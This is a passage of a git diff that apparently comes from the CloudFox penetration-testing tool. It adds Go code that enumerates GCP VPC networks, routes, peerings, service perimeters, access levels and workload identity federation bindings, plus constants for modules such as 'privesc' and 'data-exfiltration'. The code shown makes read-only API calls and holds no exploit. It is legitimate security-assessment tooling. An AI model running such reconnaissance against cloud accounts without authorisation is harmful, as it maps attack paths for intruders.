} + + var networks []VPCNetworkInfo + + resp, err := service.Networks.List(projectID).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + for _, network := range resp.Items { + info := s.parseNetwork(network, projectID) + networks = append(networks, info) + } + + return networks, nil +} + +// ListSubnets retrieves all subnets +func (s *VPCService) ListSubnets(projectID string) ([]SubnetInfo, error) { + ctx := context.Background() + var service *compute.Service + var err error + + if s.session 
!= nil { + service, err = compute.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = compute.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + var subnets []SubnetInfo + + req := service.Subnetworks.AggregatedList(projectID) + err = req.Pages(ctx, func(page *compute.SubnetworkAggregatedList) error { + for _, scopedList := range page.Items { + for _, subnet := range scopedList.Subnetworks { + info := s.parseSubnet(subnet, projectID) + subnets = append(subnets, info) + } + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + return subnets, nil +} + +// ListVPCPeerings retrieves all VPC peering connections +func (s *VPCService) ListVPCPeerings(projectID string) ([]VPCPeeringInfo, error) { + ctx := context.Background() + var service *compute.Service + var err error + + if s.session != nil { + service, err = compute.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = compute.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + var peerings []VPCPeeringInfo + + networks, err := service.Networks.List(projectID).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + for _, network := range networks.Items { + for _, peering := range network.Peerings { + // Extract peer project ID from the full network path + peerProjectID := extractProjectFromNetwork(peering.Network) + + info := VPCPeeringInfo{ + Name: peering.Name, + ProjectID: projectID, + Network: network.Name, + PeerNetwork: extractName(peering.Network), + PeerProjectID: peerProjectID, + State: peering.State, + ExportCustomRoutes: peering.ExportCustomRoutes, + ImportCustomRoutes: peering.ImportCustomRoutes, + ExchangeSubnetRoutes: peering.ExchangeSubnetRoutes, + } + peerings = append(peerings, info) + } + } + + return 
peerings, nil +} + +// ListRoutes retrieves all routes +func (s *VPCService) ListRoutes(projectID string) ([]RouteInfo, error) { + ctx := context.Background() + var service *compute.Service + var err error + + if s.session != nil { + service, err = compute.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = compute.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + var routes []RouteInfo + + resp, err := service.Routes.List(projectID).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + for _, route := range resp.Items { + info := s.parseRoute(route, projectID) + routes = append(routes, info) + } + + return routes, nil +} + +func (s *VPCService) parseNetwork(network *compute.Network, projectID string) VPCNetworkInfo { + info := VPCNetworkInfo{ + Name: network.Name, + ProjectID: projectID, + Description: network.Description, + AutoCreateSubnetworks: network.AutoCreateSubnetworks, + RoutingMode: network.RoutingConfig.RoutingMode, + MTU: network.Mtu, + } + + for _, subnet := range network.Subnetworks { + info.Subnetworks = append(info.Subnetworks, extractName(subnet)) + } + + for _, peering := range network.Peerings { + info.Peerings = append(info.Peerings, peering.Name) + } + + return info +} + +func (s *VPCService) parseSubnet(subnet *compute.Subnetwork, projectID string) SubnetInfo { + info := SubnetInfo{ + Name: subnet.Name, + ProjectID: projectID, + Network: extractName(subnet.Network), + Region: extractRegion(subnet.Region), + IPCidrRange: subnet.IpCidrRange, + GatewayAddress: subnet.GatewayAddress, + PrivateIPGoogleAccess: subnet.PrivateIpGoogleAccess, + Purpose: subnet.Purpose, + } + + if subnet.LogConfig != nil { + info.EnableFlowLogs = subnet.LogConfig.Enable + } + + for _, secondary := range subnet.SecondaryIpRanges { + info.SecondaryIPRanges = append(info.SecondaryIPRanges, fmt.Sprintf("%s:%s", 
secondary.RangeName, secondary.IpCidrRange)) + } + + return info +} + +func (s *VPCService) parseRoute(route *compute.Route, projectID string) RouteInfo { + info := RouteInfo{ + Name: route.Name, + ProjectID: projectID, + Network: extractName(route.Network), + DestRange: route.DestRange, + Priority: route.Priority, + Tags: route.Tags, + } + + // Determine next hop type + if route.NextHopGateway != "" { + info.NextHopType = "gateway" + info.NextHop = extractName(route.NextHopGateway) + } else if route.NextHopInstance != "" { + info.NextHopType = "instance" + info.NextHop = extractName(route.NextHopInstance) + } else if route.NextHopIp != "" { + info.NextHopType = "ip" + info.NextHop = route.NextHopIp + } else if route.NextHopNetwork != "" { + info.NextHopType = "network" + info.NextHop = extractName(route.NextHopNetwork) + } else if route.NextHopPeering != "" { + info.NextHopType = "peering" + info.NextHop = route.NextHopPeering + } else if route.NextHopIlb != "" { + info.NextHopType = "ilb" + info.NextHop = extractName(route.NextHopIlb) + } else if route.NextHopVpnTunnel != "" { + info.NextHopType = "vpn_tunnel" + info.NextHop = extractName(route.NextHopVpnTunnel) + } + + return info +} + +func extractProjectFromNetwork(networkPath string) string { + // Format: https://www.googleapis.com/compute/v1/projects/{project}/global/networks/{network} + // or: projects/{project}/global/networks/{network} + parts := strings.Split(networkPath, "/") + for i, part := range parts { + if part == "projects" && i+1 < len(parts) { + return parts[i+1] + } + } + return "" +} + +func extractName(fullPath string) string { + parts := strings.Split(fullPath, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullPath +} + +func extractRegion(fullPath string) string { + parts := strings.Split(fullPath, "/") + for i, part := range parts { + if part == "regions" && i+1 < len(parts) { + return parts[i+1] + } + } + return fullPath +} diff --git 
a/gcp/services/vpcscService/vpcscService.go b/gcp/services/vpcscService/vpcscService.go new file mode 100644 index 00000000..9d040989 --- /dev/null +++ b/gcp/services/vpcscService/vpcscService.go @@ -0,0 +1,251 @@ +package vpcscservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + accesscontextmanager "google.golang.org/api/accesscontextmanager/v1" +) + +type VPCSCService struct { + session *gcpinternal.SafeSession +} + +func New() *VPCSCService { + return &VPCSCService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *VPCSCService { + return &VPCSCService{session: session} +} + +// AccessPolicyInfo represents an access policy +type AccessPolicyInfo struct { + Name string `json:"name"` + Title string `json:"title"` + Parent string `json:"parent"` + Etag string `json:"etag"` + CreateTime string `json:"createTime"` + UpdateTime string `json:"updateTime"` +} + +// ServicePerimeterInfo represents a VPC Service Control perimeter +type ServicePerimeterInfo struct { + Name string `json:"name"` + Title string `json:"title"` + PolicyName string `json:"policyName"` + PerimeterType string `json:"perimeterType"` // PERIMETER_TYPE_REGULAR or PERIMETER_TYPE_BRIDGE + Description string `json:"description"` + CreateTime string `json:"createTime"` + UpdateTime string `json:"updateTime"` + + // Status configuration + Resources []string `json:"resources"` // Projects in the perimeter + RestrictedServices []string `json:"restrictedServices"` // Services protected + AccessLevels []string `json:"accessLevels"` // Access levels allowed + VPCAccessibleServices []string `json:"vpcAccessibleServices"` + + // Ingress/Egress policies + IngressPolicyCount int `json:"ingressPolicyCount"` + EgressPolicyCount int `json:"egressPolicyCount"` + HasIngressRules bool `json:"hasIngressRules"` + HasEgressRules bool `json:"hasEgressRules"` +} + +// AccessLevelInfo represents an access level +type AccessLevelInfo struct { + Name 
string `json:"name"` + Title string `json:"title"` + PolicyName string `json:"policyName"` + Description string `json:"description"` + CreateTime string `json:"createTime"` + UpdateTime string `json:"updateTime"` + + // Conditions + IPSubnetworks []string `json:"ipSubnetworks"` + Regions []string `json:"regions"` + Members []string `json:"members"` +} + +// ListAccessPolicies retrieves all access policies for an organization +func (s *VPCSCService) ListAccessPolicies(orgID string) ([]AccessPolicyInfo, error) { + ctx := context.Background() + var service *accesscontextmanager.Service + var err error + + if s.session != nil { + service, err = accesscontextmanager.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = accesscontextmanager.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "accesscontextmanager.googleapis.com") + } + + var policies []AccessPolicyInfo + + // List access policies for the organization + parent := fmt.Sprintf("organizations/%s", orgID) + req := service.AccessPolicies.List().Parent(parent) + err = req.Pages(ctx, func(page *accesscontextmanager.ListAccessPoliciesResponse) error { + for _, policy := range page.AccessPolicies { + info := AccessPolicyInfo{ + Name: extractPolicyName(policy.Name), + Title: policy.Title, + Parent: policy.Parent, + Etag: policy.Etag, + } + policies = append(policies, info) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "accesscontextmanager.googleapis.com") + } + + return policies, nil +} + +// ListServicePerimeters retrieves all service perimeters for an access policy +func (s *VPCSCService) ListServicePerimeters(policyName string) ([]ServicePerimeterInfo, error) { + ctx := context.Background() + var service *accesscontextmanager.Service + var err error + + if s.session != nil { + service, err = accesscontextmanager.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = accesscontextmanager.NewService(ctx) + } 
+ if err != nil { + return nil, gcpinternal.ParseGCPError(err, "accesscontextmanager.googleapis.com") + } + + var perimeters []ServicePerimeterInfo + + parent := fmt.Sprintf("accessPolicies/%s", policyName) + req := service.AccessPolicies.ServicePerimeters.List(parent) + err = req.Pages(ctx, func(page *accesscontextmanager.ListServicePerimetersResponse) error { + for _, perimeter := range page.ServicePerimeters { + info := s.parsePerimeter(perimeter, policyName) + perimeters = append(perimeters, info) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "accesscontextmanager.googleapis.com") + } + + return perimeters, nil +} + +// ListAccessLevels retrieves all access levels for an access policy +func (s *VPCSCService) ListAccessLevels(policyName string) ([]AccessLevelInfo, error) { + ctx := context.Background() + var service *accesscontextmanager.Service + var err error + + if s.session != nil { + service, err = accesscontextmanager.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = accesscontextmanager.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "accesscontextmanager.googleapis.com") + } + + var levels []AccessLevelInfo + + parent := fmt.Sprintf("accessPolicies/%s", policyName) + req := service.AccessPolicies.AccessLevels.List(parent) + err = req.Pages(ctx, func(page *accesscontextmanager.ListAccessLevelsResponse) error { + for _, level := range page.AccessLevels { + info := s.parseAccessLevel(level, policyName) + levels = append(levels, info) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "accesscontextmanager.googleapis.com") + } + + return levels, nil +} + +func (s *VPCSCService) parsePerimeter(perimeter *accesscontextmanager.ServicePerimeter, policyName string) ServicePerimeterInfo { + info := ServicePerimeterInfo{ + Name: extractPerimeterName(perimeter.Name), + Title: perimeter.Title, + PolicyName: policyName, + PerimeterType: 
perimeter.PerimeterType, + Description: perimeter.Description, + } + + // Parse status configuration + if perimeter.Status != nil { + info.Resources = perimeter.Status.Resources + info.RestrictedServices = perimeter.Status.RestrictedServices + info.AccessLevels = perimeter.Status.AccessLevels + + if perimeter.Status.VpcAccessibleServices != nil { + info.VPCAccessibleServices = perimeter.Status.VpcAccessibleServices.AllowedServices + } + + if len(perimeter.Status.IngressPolicies) > 0 { + info.IngressPolicyCount = len(perimeter.Status.IngressPolicies) + info.HasIngressRules = true + } + + if len(perimeter.Status.EgressPolicies) > 0 { + info.EgressPolicyCount = len(perimeter.Status.EgressPolicies) + info.HasEgressRules = true + } + } + + return info +} + +func (s *VPCSCService) parseAccessLevel(level *accesscontextmanager.AccessLevel, policyName string) AccessLevelInfo { + info := AccessLevelInfo{ + Name: extractLevelName(level.Name), + Title: level.Title, + PolicyName: policyName, + Description: level.Description, + } + + if level.Basic != nil && len(level.Basic.Conditions) > 0 { + for _, condition := range level.Basic.Conditions { + info.IPSubnetworks = append(info.IPSubnetworks, condition.IpSubnetworks...) + info.Regions = append(info.Regions, condition.Regions...) + info.Members = append(info.Members, condition.Members...) 
+ } + } + + return info +} + +func extractPolicyName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) >= 2 { + return parts[len(parts)-1] + } + return fullName +} + +func extractPerimeterName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) >= 2 { + return parts[len(parts)-1] + } + return fullName +} + +func extractLevelName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) >= 2 { + return parts[len(parts)-1] + } + return fullName +} diff --git a/gcp/services/workloadIdentityService/workloadIdentityService.go b/gcp/services/workloadIdentityService/workloadIdentityService.go new file mode 100644 index 00000000..161c020f --- /dev/null +++ b/gcp/services/workloadIdentityService/workloadIdentityService.go @@ -0,0 +1,227 @@ +package workloadidentityservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + iam "google.golang.org/api/iam/v1" +) + +type WorkloadIdentityService struct{} + +func New() *WorkloadIdentityService { + return &WorkloadIdentityService{} +} + +// WorkloadIdentityPool represents a Workload Identity Pool +type WorkloadIdentityPool struct { + Name string `json:"name"` + DisplayName string `json:"displayName"` + Description string `json:"description"` + ProjectID string `json:"projectId"` + State string `json:"state"` + Disabled bool `json:"disabled"` + PoolID string `json:"poolId"` +} + +// WorkloadIdentityProvider represents a Workload Identity Pool Provider +type WorkloadIdentityProvider struct { + Name string `json:"name"` + DisplayName string `json:"displayName"` + Description string `json:"description"` + PoolID string `json:"poolId"` + ProviderID string `json:"providerId"` + ProjectID string `json:"projectId"` + ProviderType string `json:"providerType"` // aws, oidc, saml + Disabled bool `json:"disabled"` + AttributeMapping map[string]string `json:"attributeMapping"` + AttributeCondition string 
`json:"attributeCondition"` // CEL expression + // AWS specific + AWSAccountID string `json:"awsAccountId"` + // OIDC specific + OIDCIssuerURI string `json:"oidcIssuerUri"` + AllowedAudiences []string `json:"allowedAudiences"` +} + +// FederatedIdentityBinding represents a binding from federated identity to GCP SA +type FederatedIdentityBinding struct { + ProjectID string `json:"projectId"` + PoolID string `json:"poolId"` + ProviderID string `json:"providerId"` + GCPServiceAccount string `json:"gcpServiceAccount"` + ExternalSubject string `json:"externalSubject"` + AttributeCondition string `json:"attributeCondition"` +} + +// ListWorkloadIdentityPools lists all Workload Identity Pools in a project +func (s *WorkloadIdentityService) ListWorkloadIdentityPools(projectID string) ([]WorkloadIdentityPool, error) { + ctx := context.Background() + + iamService, err := iam.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + } + + var pools []WorkloadIdentityPool + parent := fmt.Sprintf("projects/%s/locations/global", projectID) + + req := iamService.Projects.Locations.WorkloadIdentityPools.List(parent) + err = req.Pages(ctx, func(page *iam.ListWorkloadIdentityPoolsResponse) error { + for _, pool := range page.WorkloadIdentityPools { + // Extract pool ID from name + // Format: projects/PROJECT_NUMBER/locations/global/workloadIdentityPools/POOL_ID + poolID := extractLastPart(pool.Name) + + pools = append(pools, WorkloadIdentityPool{ + Name: pool.Name, + DisplayName: pool.DisplayName, + Description: pool.Description, + ProjectID: projectID, + State: pool.State, + Disabled: pool.Disabled, + PoolID: poolID, + }) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + } + + return pools, nil +} + +// ListWorkloadIdentityProviders lists all providers in a pool +func (s *WorkloadIdentityService) ListWorkloadIdentityProviders(projectID, poolID string) ([]WorkloadIdentityProvider, 
error) { + ctx := context.Background() + + iamService, err := iam.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + } + + var providers []WorkloadIdentityProvider + parent := fmt.Sprintf("projects/%s/locations/global/workloadIdentityPools/%s", projectID, poolID) + + req := iamService.Projects.Locations.WorkloadIdentityPools.Providers.List(parent) + err = req.Pages(ctx, func(page *iam.ListWorkloadIdentityPoolProvidersResponse) error { + for _, provider := range page.WorkloadIdentityPoolProviders { + // Extract provider ID from name + providerID := extractLastPart(provider.Name) + + wip := WorkloadIdentityProvider{ + Name: provider.Name, + DisplayName: provider.DisplayName, + Description: provider.Description, + PoolID: poolID, + ProviderID: providerID, + ProjectID: projectID, + Disabled: provider.Disabled, + AttributeMapping: provider.AttributeMapping, + AttributeCondition: provider.AttributeCondition, + } + + // Determine provider type and extract specific config + if provider.Aws != nil { + wip.ProviderType = "AWS" + wip.AWSAccountID = provider.Aws.AccountId + } else if provider.Oidc != nil { + wip.ProviderType = "OIDC" + wip.OIDCIssuerURI = provider.Oidc.IssuerUri + wip.AllowedAudiences = provider.Oidc.AllowedAudiences + } else if provider.Saml != nil { + wip.ProviderType = "SAML" + } + + providers = append(providers, wip) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + } + + return providers, nil +} + +// FindFederatedIdentityBindings finds all service accounts with federated identity bindings +func (s *WorkloadIdentityService) FindFederatedIdentityBindings(projectID string, pools []WorkloadIdentityPool) ([]FederatedIdentityBinding, error) { + ctx := context.Background() + + iamService, err := iam.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + } + + var bindings []FederatedIdentityBinding + + // 
List all service accounts + parent := fmt.Sprintf("projects/%s", projectID) + saReq := iamService.Projects.ServiceAccounts.List(parent) + err = saReq.Pages(ctx, func(page *iam.ListServiceAccountsResponse) error { + for _, sa := range page.Accounts { + // Get IAM policy for this service account + policyReq := iamService.Projects.ServiceAccounts.GetIamPolicy(sa.Name) + policy, pErr := policyReq.Do() + if pErr != nil { + continue + } + + // Look for federated identity bindings + for _, binding := range policy.Bindings { + if binding.Role == "roles/iam.workloadIdentityUser" { + for _, member := range binding.Members { + // Check if this is a federated identity + // Format: principal://iam.googleapis.com/projects/PROJECT_NUMBER/locations/global/workloadIdentityPools/POOL_ID/subject/SUBJECT + // Or: principalSet://iam.googleapis.com/projects/PROJECT_NUMBER/locations/global/workloadIdentityPools/POOL_ID/attribute.ATTR/VALUE + if strings.HasPrefix(member, "principal://") || strings.HasPrefix(member, "principalSet://") { + fib := s.parseFederatedIdentityBinding(member, sa.Email, projectID) + if fib != nil { + bindings = append(bindings, *fib) + } + } + } + } + } + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + } + + return bindings, nil +} + +// parseFederatedIdentityBinding parses a federated identity member string +func (s *WorkloadIdentityService) parseFederatedIdentityBinding(member, gcpSA, projectID string) *FederatedIdentityBinding { + // principal://iam.googleapis.com/projects/PROJECT_NUMBER/locations/global/workloadIdentityPools/POOL_ID/subject/SUBJECT + // principalSet://iam.googleapis.com/projects/PROJECT_NUMBER/locations/global/workloadIdentityPools/POOL_ID/attribute.ATTR/VALUE + + fib := &FederatedIdentityBinding{ + ProjectID: projectID, + GCPServiceAccount: gcpSA, + ExternalSubject: member, + } + + // Extract pool ID + if idx := strings.Index(member, "workloadIdentityPools/"); idx != -1 { + rest := 
member[idx+len("workloadIdentityPools/"):] + if slashIdx := strings.Index(rest, "/"); slashIdx != -1 { + fib.PoolID = rest[:slashIdx] + } + } + + return fib +} + +// extractLastPart extracts the last part of a resource name +func extractLastPart(name string) string { + parts := strings.Split(name, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return name +} diff --git a/globals/gcp.go b/globals/gcp.go index 1ec42f68..42cd4ae6 100644 --- a/globals/gcp.go +++ b/globals/gcp.go @@ -1,15 +1,84 @@ package globals // Module names -// const GCP_WHOAMI_MODULE_NAME = "whoami" const GCP_ARTIFACT_RESGISTRY_MODULE_NAME string = "artifact-registry" const GCP_BIGQUERY_MODULE_NAME string = "bigquery" const GCP_BUCKETS_MODULE_NAME string = "buckets" const GCP_INSTANCES_MODULE_NAME string = "instances" const GCP_IAM_MODULE_NAME string = "iam" +const GCP_PERMISSIONS_MODULE_NAME string = "permissions" const GCP_SECRETS_MODULE_NAME string = "secrets" const GCP_WHOAMI_MODULE_NAME string = "whoami" +// New module names +const GCP_FUNCTIONS_MODULE_NAME string = "functions" +const GCP_CLOUDRUN_MODULE_NAME string = "cloudrun" +const GCP_CLOUDSQL_MODULE_NAME string = "cloudsql" +const GCP_GKE_MODULE_NAME string = "gke" +const GCP_PUBSUB_MODULE_NAME string = "pubsub" +const GCP_KMS_MODULE_NAME string = "kms" +const GCP_SERVICEACCOUNTS_MODULE_NAME string = "serviceaccounts" +const GCP_LOGGING_MODULE_NAME string = "logging" +const GCP_NETWORKS_MODULE_NAME string = "networks" +const GCP_FIREWALL_MODULE_NAME string = "firewall" +const GCP_DNS_MODULE_NAME string = "dns" +const GCP_SCHEDULER_MODULE_NAME string = "scheduler" +const GCP_ORGANIZATIONS_MODULE_NAME string = "organizations" +const GCP_APIKEYS_MODULE_NAME string = "apikeys" +const GCP_EXPOSURE_MODULE_NAME string = "exposure" +const GCP_CLOUDBUILD_MODULE_NAME string = "cloudbuild" +const GCP_DATAFLOW_MODULE_NAME string = "dataflow" +const GCP_COMPOSER_MODULE_NAME string = "composer" +const GCP_MEMORYSTORE_MODULE_NAME string 
// GCP module-name constants (globals/gcp.go continued).
// These strings are the CLI command names registered for each module; they
// must stay in sync with the cobra command definitions.
const GCP_FILESTORE_MODULE_NAME string = "filestore"
const GCP_SPANNER_MODULE_NAME string = "spanner"
const GCP_BIGTABLE_MODULE_NAME string = "bigtable"
const GCP_VPCSC_MODULE_NAME string = "vpc-sc"
const GCP_WORKLOAD_IDENTITY_MODULE_NAME string = "workload-identity"
const GCP_ASSET_INVENTORY_MODULE_NAME string = "asset-inventory"
const GCP_LOADBALANCERS_MODULE_NAME string = "loadbalancers"
const GCP_VPCNETWORKS_MODULE_NAME string = "vpc-networks"
const GCP_NOTEBOOKS_MODULE_NAME string = "notebooks"
const GCP_DATAPROC_MODULE_NAME string = "dataproc"
const GCP_IAP_MODULE_NAME string = "iap"
const GCP_BEYONDCORP_MODULE_NAME string = "beyondcorp"
const GCP_ACCESSLEVELS_MODULE_NAME string = "access-levels"

// Pentest modules
const GCP_KEYS_MODULE_NAME string = "keys"
const GCP_HMACKEYS_MODULE_NAME string = "hmac-keys"
const GCP_PRIVESC_MODULE_NAME string = "privesc"
const GCP_ORGPOLICIES_MODULE_NAME string = "org-policies"
const GCP_BUCKETENUM_MODULE_NAME string = "bucket-enum"
const GCP_CROSSPROJECT_MODULE_NAME string = "cross-project"
const GCP_PUBLICRESOURCES_MODULE_NAME string = "public-resources"
const GCP_SOURCEREPOS_MODULE_NAME string = "source-repos"
const GCP_LOGGINGGAPS_MODULE_NAME string = "logging-gaps"
const GCP_SSHOSLOGIN_MODULE_NAME string = "ssh-oslogin"
const GCP_SERVICEAGENTS_MODULE_NAME string = "service-agents"
const GCP_DOMAINWIDEDELEGATION_MODULE_NAME string = "domain-wide-delegation"
const GCP_PRIVATESERVICECONNECT_MODULE_NAME string = "private-service-connect"
const GCP_CLOUDARMOR_MODULE_NAME string = "cloud-armor"
const GCP_CERTMANAGER_MODULE_NAME string = "cert-manager"

// Resource IAM module
const GCP_RESOURCEIAM_MODULE_NAME string = "resource-iam"

// New security analysis modules (Azure equivalents)
const GCP_SECURITYCENTER_MODULE_NAME string = "security-center"
const GCP_LATERALMOVEMENT_MODULE_NAME string = "lateral-movement"
const GCP_DATAEXFILTRATION_MODULE_NAME string = "data-exfiltration"
"data-exfiltration" +const GCP_BACKUPINVENTORY_MODULE_NAME string = "backup-inventory" +const GCP_COMPLIANCEDASHBOARD_MODULE_NAME string = "compliance-dashboard" +const GCP_COSTSECURITY_MODULE_NAME string = "cost-security" +const GCP_MONITORINGALERTS_MODULE_NAME string = "monitoring-alerts" +const GCP_NETWORKTOPOLOGY_MODULE_NAME string = "network-topology" + +// Verbosity levels (matching Azure pattern) +var GCP_VERBOSITY int = 0 + +const GCP_VERBOSE_ERRORS = 9 + // const GCP_INVENTORY_MODULE_NAME string = "inventory" // const GCP_GCLOUD_REFRESH_TOKENS_DB_PATH = ".config/gcloud/credentials.db" // const GCP_GCLOUD_ACCESS_TOKENS_DB_PATH = ".config/gcloud/access_tokens.db" diff --git a/go.mod b/go.mod index 7e1bec1b..b46a1634 100644 --- a/go.mod +++ b/go.mod @@ -87,9 +87,12 @@ require ( require ( cel.dev/expr v0.25.1 // indirect + cloud.google.com/go/accesscontextmanager v1.9.7 // indirect cloud.google.com/go/auth v0.17.0 // indirect cloud.google.com/go/auth/oauth2adapt v0.2.8 // indirect - cloud.google.com/go/monitoring v1.24.3 // indirect + cloud.google.com/go/orgpolicy v1.15.1 // indirect + cloud.google.com/go/osconfig v1.15.1 // indirect + cloud.google.com/go/pubsub/v2 v2.0.0 // indirect github.com/GoogleCloudPlatform/opentelemetry-operations-go/detectors/gcp v1.30.0 // indirect github.com/GoogleCloudPlatform/opentelemetry-operations-go/exporter/metric v0.54.0 // indirect github.com/GoogleCloudPlatform/opentelemetry-operations-go/internal/resourcemapping v0.54.0 // indirect @@ -122,6 +125,7 @@ require ( github.com/planetscale/vtprotobuf v0.6.1-0.20240319094008-0393e58bdf10 // indirect github.com/spiffe/go-spiffe/v2 v2.6.0 // indirect github.com/xo/terminfo v0.0.0-20220910002029-abceb7e1c41e // indirect + go.opencensus.io v0.24.0 // indirect go.opentelemetry.io/auto/sdk v1.2.1 // indirect go.opentelemetry.io/contrib/detectors/gcp v1.39.0 // indirect go.opentelemetry.io/contrib/instrumentation/google.golang.org/grpc/otelgrpc v0.64.0 // indirect @@ -137,6 +141,12 @@ 
require ( ) require ( + cloud.google.com/go/asset v1.22.0 + cloud.google.com/go/kms v1.23.2 + cloud.google.com/go/logging v1.13.1 + cloud.google.com/go/monitoring v1.24.3 + cloud.google.com/go/pubsub v1.50.1 + cloud.google.com/go/securitycenter v1.38.1 github.com/aws/aws-sdk-go-v2/service/kms v1.49.4 golang.org/x/oauth2 v0.34.0 google.golang.org/api v0.257.0 @@ -209,5 +219,5 @@ require ( golang.org/x/xerrors v0.0.0-20240903120638-7835f813f4da // indirect google.golang.org/genproto/googleapis/api v0.0.0-20251202230838-ff82c1b0f217 // indirect google.golang.org/genproto/googleapis/rpc v0.0.0-20251202230838-ff82c1b0f217 // indirect - google.golang.org/grpc v1.77.0 // indirect + google.golang.org/grpc v1.77.0 ) diff --git a/go.sum b/go.sum index 6f23c6f7..699fb8a7 100644 --- a/go.sum +++ b/go.sum @@ -1,9 +1,14 @@ cel.dev/expr v0.25.1 h1:1KrZg61W6TWSxuNZ37Xy49ps13NUovb66QLprthtwi4= cel.dev/expr v0.25.1/go.mod h1:hrXvqGP6G6gyx8UAHSHJ5RGk//1Oj5nXQ2NI02Nrsg4= +cloud.google.com/go v0.26.0/go.mod h1:aQUYkXzVsufM+DwF1aE+0xfcU+56JwCaLick0ClmMTw= cloud.google.com/go v0.123.0 h1:2NAUJwPR47q+E35uaJeYoNhuNEM9kM8SjgRgdeOJUSE= cloud.google.com/go v0.123.0/go.mod h1:xBoMV08QcqUGuPW65Qfm1o9Y4zKZBpGS+7bImXLTAZU= +cloud.google.com/go/accesscontextmanager v1.9.7 h1:aKIfg7Jyc73pe8bzx0zypNdS5gfFdSvFvB8YNA9k2kA= +cloud.google.com/go/accesscontextmanager v1.9.7/go.mod h1:i6e0nd5CPcrh7+YwGq4bKvju5YB9sgoAip+mXU73aMM= cloud.google.com/go/artifactregistry v1.18.0 h1:4qQIM1a1OymPxCODgLpXJo+097feE0i9pwpof98SimQ= cloud.google.com/go/artifactregistry v1.18.0/go.mod h1:UEAPCgHDFC1q+A8nnVxXHPEy9KCVOeavFBF1fEChQvU= +cloud.google.com/go/asset v1.22.0 h1:81Ru5hjHfiGtk+u/Ix69eaWieKpvm7Ce7UHtcZhOLbk= +cloud.google.com/go/asset v1.22.0/go.mod h1:q80JP2TeWWzMCazYnrAfDf36aQKf1QiKzzpNLflJwf8= cloud.google.com/go/auth v0.17.0 h1:74yCm7hCj2rUyyAocqnFzsAYXgJhrG26XCFimrc/Kz4= cloud.google.com/go/auth v0.17.0/go.mod h1:6wv/t5/6rOPAX4fJiRjKkJCvswLwdet7G8+UGXt7nCQ= cloud.google.com/go/auth/oauth2adapt v0.2.8 
h1:keo8NaayQZ6wimpNSmW5OPc283g65QNIiLpZnkHRbnc= @@ -16,16 +21,28 @@ cloud.google.com/go/datacatalog v1.26.1 h1:bCRKA8uSQN8wGW3Tw0gwko4E9a64GRmbW1nCb cloud.google.com/go/datacatalog v1.26.1/go.mod h1:2Qcq8vsHNxMDgjgadRFmFG47Y+uuIVsyEGUrlrKEdrg= cloud.google.com/go/iam v1.5.3 h1:+vMINPiDF2ognBJ97ABAYYwRgsaqxPbQDlMnbHMjolc= cloud.google.com/go/iam v1.5.3/go.mod h1:MR3v9oLkZCTlaqljW6Eb2d3HGDGK5/bDv93jhfISFvU= +cloud.google.com/go/kms v1.23.2 h1:4IYDQL5hG4L+HzJBhzejUySoUOheh3Lk5YT4PCyyW6k= +cloud.google.com/go/kms v1.23.2/go.mod h1:rZ5kK0I7Kn9W4erhYVoIRPtpizjunlrfU4fUkumUp8g= cloud.google.com/go/logging v1.13.1 h1:O7LvmO0kGLaHY/gq8cV7T0dyp6zJhYAOtZPX4TF3QtY= cloud.google.com/go/logging v1.13.1/go.mod h1:XAQkfkMBxQRjQek96WLPNze7vsOmay9H5PqfsNYDqvw= cloud.google.com/go/longrunning v0.7.0 h1:FV0+SYF1RIj59gyoWDRi45GiYUMM3K1qO51qoboQT1E= cloud.google.com/go/longrunning v0.7.0/go.mod h1:ySn2yXmjbK9Ba0zsQqunhDkYi0+9rlXIwnoAf+h+TPY= cloud.google.com/go/monitoring v1.24.3 h1:dde+gMNc0UhPZD1Azu6at2e79bfdztVDS5lvhOdsgaE= cloud.google.com/go/monitoring v1.24.3/go.mod h1:nYP6W0tm3N9H/bOw8am7t62YTzZY+zUeQ+Bi6+2eonI= +cloud.google.com/go/orgpolicy v1.15.1 h1:0hq12wxNwcfUMojr5j3EjWECSInIuyYDhkAWXTomRhc= +cloud.google.com/go/orgpolicy v1.15.1/go.mod 